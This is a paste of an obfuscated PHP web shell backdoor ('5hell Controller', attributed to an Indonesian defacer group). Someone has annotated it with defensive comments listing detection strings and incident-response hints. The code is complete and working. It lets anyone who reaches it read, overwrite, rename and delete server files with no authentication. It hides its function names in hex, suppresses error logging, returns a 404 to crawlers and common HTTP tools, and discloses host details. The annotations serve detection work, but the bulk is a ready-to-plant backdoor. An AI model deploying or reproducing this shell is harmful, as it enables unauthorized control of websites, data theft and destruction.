[PHP] FUD Mini Shell Backdoor

Guest 32 20th Apr, 2019

                                           
                         <?php
/**
*
* [ FUD - MINI SHELL BACKDOOR ].
*
* @author BLACKHATCODE < BIMACYBERTEAM@GMAIL.COM >
* @copyright (C) 2019 INDONESIAN DEFACER.
* THANKS TO : B374K, ZER0BYTE, SHUTDOWN57, SHOR7CUT
*
**/
// ANALYSIS: bootstrap. The @ operator and error_reporting(0) silence PHP
// errors, and set_time_limit(0) lifts the execution time limit for the request.
// Nothing in the visible code checks a password, token or session value before
// the request handlers further down run.
@session_start();
@ob_start();
set_time_limit(0);
error_reporting(0);
// Response header asking browsers to switch off their legacy XSS filter.
header("X-XSS-Protection: 0");
$config = array();
$config['version'] 	= "1.0"; // VERSION.SUBVERSION
// This title is echoed into the page <title> together with the Host header, so
// the literal is a string to search for in file-content and response-body scans.
$config['title'] 	= "5hell Controller ".$config['version']; // TITLE
// CLEAN MAGIC QUOTES
// The request superglobals are overwritten with the output of clean(), which is
// defined later in this file.
$_POST      = clean($_POST);
$_GET       = clean($_GET);
$_REQUEST   = clean($_REQUEST);
/**
* /-----------------------------------/
* / SOME DEFINE PATH, ACTION, ETC.    /
* /-----------------------------------/
*/
define('ROOT',getcwd());
define('DS',DIRECTORY_SEPARATOR);
// CURR_PATH comes straight from the "u" query parameter when it is non-empty;
// no validation or base-directory check is applied.
define('CURR_PATH',(empty($_GET['u'])) ? ROOT : $_GET['u']);
// ****
// $__style is later passed through gzinflate(base64_decode(...)) and echoed
// inside a <style> element. The literal is not present in this copy of the
// paste, so its decoded content cannot be inspected here.
$__style	= "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";
// ANALYSIS: the next five strings are PHP function names written as split,
// hex-escaped literals and later invoked as variable functions. They decode to
// getcwd, file_get_contents, scandir, rmdir and unlink (in that order). A
// plain-text search for those names will not match these call sites; matching
// on "\x.." string concatenations combined with $var(...) calls is more
// reliable for content scanning.
$__getcwd    	= "\x67"."\x65\x74\x63\x77\x64";
$__fget_con 	= "\x66\x69\x6c\x65"."\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$__sc_dir     	= "s"."\x63\x61\x6e\x64\x69"."r";
$__rm_dir     	= "\x72\x6d\x64"."ir";
$__un_link    	= "\x75\x6e"."\x6c\x69\x6e\x6b";
// BLOCK SEARCH ENGINE BOT
// ANALYSIS: User-Agent cloaking. A request whose User-Agent matches the list
// below (crawlers, a named vulnerability scanner, and common HTTP tools and
// libraries) or that carries no User-Agent header at all gets a 404 status and
// an empty body. For defenders this means a 404 from an automated HTTP probe
// is not evidence that the file is absent; confirm from the filesystem or a
// file-integrity baseline rather than from the HTTP status.
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|acunetix|facebook|node|crawler|googlebot|facebookexternalhit|google|bing|yahoo|yahooseeker|yahoo!|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|PycURL|Mediapartners|facebok|rambler|msnbot|yandex|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}
// MAGIC QUOTE BYPASS
/**
 * Undoes magic-quotes escaping on a request array.
 *
 * The array is only modified when get_magic_quotes_gpc() exists and returns
 * true; otherwise $arr is returned unchanged. Nested arrays are processed
 * recursively. When the magic_quotes_sybase ini value is set to something
 * other than "off", a str_replace() is applied before stripslashes().
 *
 * @param mixed $arr Request data (the callers pass $_POST, $_GET, $_REQUEST).
 * @return mixed The same structure with added slashes removed.
 */
function clean($arr){
	$quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
	if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
		if(is_array($arr)){
			foreach($arr as $k=>$v){
				if(is_array($v)) $arr[$k] = clean($v);
				else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
				}
			}
		}
		return $arr;
	}
	// DISABLE DEBUGING
	// ANALYSIS: $__server_debug is not assigned anywhere in the visible code, so
	// as shown the else branch is the one that runs: error reporting, on-screen
	// errors and PHP error logging are all switched off at runtime. The debug
	// branch also references $_GP and hss(), neither of which is defined in this
	// paste (presumably left over from a larger script -- unconfirmed).
	// Because log_errors is disabled here, the PHP error log is unlikely to show
	// this script's activity; web-server access logs and file-integrity
	// monitoring are the records to rely on.
	if($__server_debug){
		error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
		@ini_set('display_errors','1');
		@ini_set('log_errors','1');
		foreach($_GP as $k=>$v){
			if(is_array($v)) $v = print_r($v, true);
			echo "<span>".hss($k."=>".$v)."</span><br />";
		}
	}else{
		error_reporting(0);
		@ini_set('display_errors','0');
		@ini_set('log_errors','0');
	}
	// CLEAN LOGS
	// Captures whatever has been written to the output buffer so far, then
	// discards that buffer and starts a new one. notif() is only called when the
	// captured buffer is non-empty; it is not defined in the visible paste.
	$__server_error    = @ob_get_contents();
	$__server_result   = isset($__server_result) ? $__server_result:"";
	if(!empty($__server_error)) $__server_result = notif($__server_error).$__server_result;
	@ob_end_clean();
	@ob_start();

	// GET FILE PERMISSIONS
	/**
	 * Formats the mode returned by fileperms() as a ten-character string in the
	 * style of `ls -l` (for example "-rw-r--r--").
	 *
	 * The first character is the file type (s, l, -, b, d, c, p, or u when no
	 * type bits match). The remaining nine are the owner/group/other rwx bits,
	 * with s/S, s/S and t/T substituted in the execute positions when the
	 * 0x0800, 0x0400 and 0x0200 bits are set.
	 *
	 * @param string $__server_file Path handed to fileperms().
	 * @return string Permission string.
	 */
	function perms($__server_file){
		$perms = fileperms($__server_file);
		// File-type bits, tested from the highest mask down.
		if(($perms & 0xC000) == 0xC000){$info = 's';
	}elseif (($perms & 0xA000) == 0xA000){$info = 'l';
	}elseif (($perms & 0x8000) == 0x8000){$info = '-';
	}elseif (($perms & 0x6000) == 0x6000){$info = 'b';
	}elseif (($perms & 0x4000) == 0x4000){$info = 'd';
	}elseif (($perms & 0x2000) == 0x2000){$info = 'c';
	}elseif (($perms & 0x1000) == 0x1000){$info = 'p';
	}else {$info = 'u';
}
	// Owner bits.
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
	// Group bits.
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
	// Other bits.
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
	return $info;
}
/**
 * Deletes the file or directory at $filelok.
 *
 * For a directory it first tries rmdir(); if that fails it walks the scandir()
 * listing, unlinking plain files and calling rmdir() on immediate
 * subdirectories. It does not call itself on subdirectories, and it performs
 * no check that the path stays under any base directory.
 *
 * ANALYSIS: the only caller in this file is the bulk-delete request handler,
 * which passes each $_POST['fl'] value unchanged. Deletion therefore reaches
 * any path the PHP process has permission to remove.
 *
 * @param string $filelok Path to remove (request-supplied at the call site).
 * @return mixed Value left in $rm by the last rmdir()/unlink() call made.
 */
function mass_delete($filelok){
	if(is_dir($filelok)){
		if(!rmdir($filelok)){
			$s=scandir($filelok);
			foreach ($s as $ss) {
				if(is_file($filelok."/".$ss)){
					if(unlink($filelok."/".$ss)){
						$rm=rmdir($filelok);
					}
				}
				if(is_dir($filelok."/".$ss)){
					$rm=rmdir($filelok."/".$ss);
					$rm.=rmdir($filelok);
				}
			}
		}elseif(is_file($filelok)){
			$rm = unlink($filelok);
		}
	}elseif(is_file($filelok)){
		$rm = unlink($filelok);
	}
	return $rm;
}
/**
 * Sends the client to $kemana using one of three mechanisms.
 *
 * 'html' echoes a meta-refresh tag, 'js' echoes a window.location script, and
 * 'php' sends a Location header. Any other $apa value does nothing.
 * $kemana is inserted into the output without escaping or validation.
 *
 * ANALYSIS: the one call in this file passes '?path=' followed by CURR_PATH,
 * and CURR_PATH is taken from the "u" query parameter.
 *
 * @param string $kemana Redirect target.
 * @param string $apa    Mechanism: 'html' (default), 'js' or 'php'.
 * @return void
 */
function redirect($kemana, $apa = 'html'){
	if($apa == 'html'){
		echo "<meta http-equiv='refresh' content='0;url={$kemana}'>";
	}elseif($apa == 'js'){
		echo "<script>window.location.href='{$kemana}';</script>";
	}elseif($apa == 'php'){
		@ob_start();
		header('location:'.$kemana);
		flush();
	}
}
// SERVER INFORMATION
// ANALYSIS: host details disclosed to whoever loads the page. The values are
// the SERVER_SOFTWARE environment variable, php_uname() output, the address
// that the request's Host header resolves to, the client's REMOTE_ADDR and the
// server clock. They are concatenated into an HTML table without escaping and
// echoed right after the <body> tag.
$__server_software 	= getenv("SERVER_SOFTWARE");
$__server_system 	= php_uname();
$__server_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
$__server_my_ip = $_SERVER['REMOTE_ADDR'];
$__server_info  = "<table><tr><td>↺&nbsp;".$__server_system."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;".$__server_software."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;Server IP : ".$__server_server_ip."<span class='gaya'> | </span>Your IP : ".$__server_my_ip;
$__server_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
$__server_info .= "</table>";

// ANALYSIS: page head. Everything from the opening quote down to the
// gzinflate() call is one double-quoted PHP string, so the JavaScript inside
// it is output text rather than PHP code.
// External hosts referenced by this file: fonts.googleapis.com,
// code.jquery.com, cdn.jsdelivr.net and nzsc.xtgem.com (favicon here, folder
// and file icons in the directory listing). They appear in link/script/img
// tags, so they are requested by the viewing browser, not by the server; the
// URLs remain useful as literal strings for file-content scanning.
// $_SERVER['HTTP_HOST'] is written into <title> without escaping.
// The stylesheet is produced by gzinflate(base64_decode($__style)), a
// decode chain that content scanners commonly key on.
echo "<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
<script type='text/javascript' src='https://code.jquery.com/jquery-3.4.0.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@8.17.0/dist/lazyload.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@10.19.0/dist/lazyload.min.js'></script>
<script type='text/javascript'> url.split('?')[0] </script>
<script type='text/javascript'>
function select_all(pilih){
	var cek = document.getElementsByName('fl[]');
	for (var i =0; n=cek.length;i++) {
		cek[i].checked = pilih.checked;
	}
}
function hs(a,x){
	document.getElementById(a).style.display='block';
	document.getElementById(x).style.display='none';
}
</script>
<title>".$config['title']." - ".$_SERVER['HTTP_HOST']." </title>
<link rel='shortcut icon' href='http://nzsc.xtgem.com/favicon.png' />
<style type='text/css'>".$__css = gzinflate(base64_decode($__style));echo $__css."</style>
</head>
<body>";
echo $__server_info;
// ANALYSIS: the working directory is taken directly from the "path" query
// parameter and passed to chdir() with no validation or base-directory
// restriction. Without that parameter the script calls getcwd() through the
// hex-encoded variable-function name $__getcwd.
if (isset($_GET['path'])){
	$path = $_GET['path']; chdir($_GET['path']);
}else{
	$path = $__getcwd();
}
// Normalise Windows separators, then split the path into its components.
$path  = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo '<table width="100%" border="0" align="center""><tr><td>';
echo "↺&nbsp;Location : ";
// Breadcrumb: one link per path component, each pointing at ?path=<prefix>.
// The components are echoed into the href and link text without escaping.
foreach ($paths as $id => $location){
	echo "<a href='?path=";
	for ($i = 0; $i <= $id; $i++){
		echo $paths[$i];
		if ($i != $id){
			echo "/";
		}
	}
	echo "'>$location / </a>";
}
echo '&nbsp;- [ <a href="?">Home</a> ]</font></td>';
echo '<tr><td></table><br />';
// ANALYSIS: request dispatcher. Each branch performs a filesystem operation
// on a path taken from the request, with the privileges of the PHP process and
// with no authentication or path restriction in the visible code.
// Parameters used: query string "path", "filesrc", "option", "u"; POST fields
// "sac", "action", "fl[]", "opt", "type", "name", "newname", "path", "src".
// The query-string names show up in ordinary access logs; the POST fields are
// only visible where request bodies are captured (for example WAF or audit
// logging).
if(isset($_POST['sac'])){
	// Bulk delete: every submitted fl[] value is handed to mass_delete().
	if($_POST['action'] == 'delete'){
		foreach($_POST['fl'] as $dfil){
			@mass_delete($dfil);
		}
	}
	@redirect('?path='.CURR_PATH.'');
}elseif(isset($_GET['filesrc'])){
	// File read: the file named by "filesrc" is read through the hex-encoded
	// file_get_contents alias and displayed. The contents are passed through
	// htmlspecialchars(); the file name shown above them is not.
	echo '<table width="100%" border="0" cellpadding="1" cellspacing="1" align="center">
	<tr><td>
	Filename : '.basename($_GET['filesrc']).'
	</tr></td></table><br />';
	echo "<center><div id='result'><textarea class='inputzbut' style='margin: 0px; height: 357px; width: 100%;'' readonly=''>" . htmlspecialchars($__fget_con($_GET['filesrc'])) . "</textarea></div></center>";
}elseif($_POST['opt'] == 'rename'){
	// Rename: moves POST "path" to <current path>/<POST "newname">.
	if(isset($_POST['newname'])){
		if(rename($_POST['path'], $path.'/'.$_POST['newname'])){
			$result = '<font color="#00ff00">Rename File OK !</font>';
		}else{
			$result = '<font color="red">Rename File Failed !</font>';
		}
		$_POST['name'] = $_POST['newname'];
	}
	echo '<form method="POST">
	<div id="result">
	New Filename : <input name="newname" class="inputz" style="width:40%;height:19px;" type="text" value="'.$_POST['name'].'" />
	<input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
	<label>'.$result.'</label>
	<input type="hidden" name="path" value="'.$_POST['path'].'">
	<input type="hidden" name="opt" value="rename">
	</div></form>';
}elseif($_POST['opt'] == 'edit'){
	// File write: POST "src" is written over the file named by POST "path"
	// (opened in 'w' mode, so existing content is truncated). For incident
	// response, every file writable by the PHP process should be treated as
	// possibly modified and compared against a known-good copy.
	if(isset($_POST['src'])){
		$fp = fopen($_POST['path'], 'w');
		if(fwrite($fp, $_POST['src'])){
			$result = '<font color="#00ff00">Edit File OK !</font>';
		}else{
			$result = '<font color="red">Edit File Failed !</font>';
		}
		fclose($fp);
	}
	echo '<form method="POST">
	<div id="result">
	Filename : <input class="inputz" style="width:40%;height:19px;" type="text" name="path" value="'.$_POST['path'].'" />
	<input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
	<label>'.$result.'</label>
	<input type="hidden" name="opt" value="edit"><br /><br />
	<textarea class="inputzbut" style="margin: 0px; height: 357px; width: 100%;" name="src" id="src">'.htmlspecialchars($__fget_con($_POST['path'])).'</textarea></form></div>';
}else{
	// Single delete: requires the "option" query parameter plus POST opt=delete;
	// calls the hex-encoded rmdir or unlink alias on POST "path" depending on
	// POST "type".
	if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
		if ($_POST['type'] == 'dir') {
			if ($__rm_dir($_POST['path'])){
				$result = '<font color="#00ff00">Delete Folder OK !</font>';
			}else{
				$result = '<font color="red">Delete Folder Failed !</font>';
			}
		}elseif($_POST['type'] == 'file'){
			if ($__un_link($_POST['path'])){
				$result = '<font color="#00ff00">Delete File OK !</font>';
			}else{
				$result = '<font color="red">Delete File Failed !</font>';
			}
		}
	}
	// Directory listing of $path through the hex-encoded scandir alias.
	$_scdir = $__sc_dir($path);
	echo '<div id="result">
	<form method="post">
	<table class="explore sortable" border="0" cellpadding="3" cellspacing="1" align="center">
	<thead>
	<tr class="first">
	<th width="1%"><input id="checkalll" type="checkbox" name="fl[]" onclick="select_all(this)" /></th>
	<th><center>Filename</center></th>
	<th width="10%"><center>Size</center></th>
	<th width="10%"><center>Permissions</center></th>
	<th width="15%"><center>Last Update</center></th>
	<th width="15%"><center>Options</center></th></tr>
	</thead>';
	// First pass: subdirectories, skipping "." and "..". Names and paths are
	// interpolated into the HTML without escaping.
	foreach ($_scdir as $dir) {
		if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')
			continue;
		echo "<tr>
		<td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$dir}' /></center></td>
		<td><img src='http://nzsc.xtgem.com/folder.png' width=15px>&nbsp;
		<a href=\"?path=$path/$dir\">[ $dir ]</a></td>
		<td><center>--</center></td>
		<td><center>";
		if (is_writable("$path/$dir"))
			echo '<font color="#00ff00">';
		elseif (!is_readable("$path/$dir"))
			echo '<font color="red">';
		echo perms("$path/$dir");
		if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
			echo '</font>';
		echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
		echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
	}
	// Second pass: regular files, with size shown in KB or MB.
	foreach ($_scdir as $file) {
		if (!is_file("$path/$file"))
			continue;
		$size = filesize("$path/$file") / 1024;
		$size = round($size, 3);
		if ($size >= 1024) {
			$size = round($size / 1024, 2) . ' MB';
		} else {
			$size = $size . ' KB';
		}
		echo "<tr>
		<td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$file}' /></center></td>
		<td><img src='http://nzsc.xtgem.com/file2.png' width=15px>&nbsp;
		<a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
		<td>".$size."</td>
		<td><center>";
		if (is_writable("$path/$file"))
			echo '<font color="#00ff00">';
		elseif (!is_readable("$path/$file"))
			echo '<font color="red">';
		echo perms("$path/$file");
		if (is_writable("$path/$file") || !is_readable("$path/$file"))
			echo '</font>';
		echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
		echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"edit\">Edit</option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
	}
	echo '<tr>
	<td style="text-align:center;border-top:3px ;text-indent:4px;">
	<input id="checkalll" class="css-checkbox" type="checkbox" name="fl[]" onclick="select_all(this)" />
	<label for="checkalll" class="css-label"></label>
	</td>
	<td style="border-top:3px ;">
	<select id="action" name="action" class="inputzbut" style="width:85%;height:18px;margin:0;">
	<option value="" disabled selected>--- [ Choose Action ] ---</option>
	<option value="delete">Delete</option>
	</select>
	<input type="submit" value="Execute" name="sac" class="inputzbut" />
	</td>
	</form>
	</td>
	</tr>
	</table></div>';
}
// Static page footer. The attribution text is a fixed literal in both the file
// and every rendered response, so it can serve as a content-scan string.
echo '<br><center>&copy; <a href="">2019</a> - Indonesian Defacer</center><br>';
echo '</body></html>';
?>
                      
                                       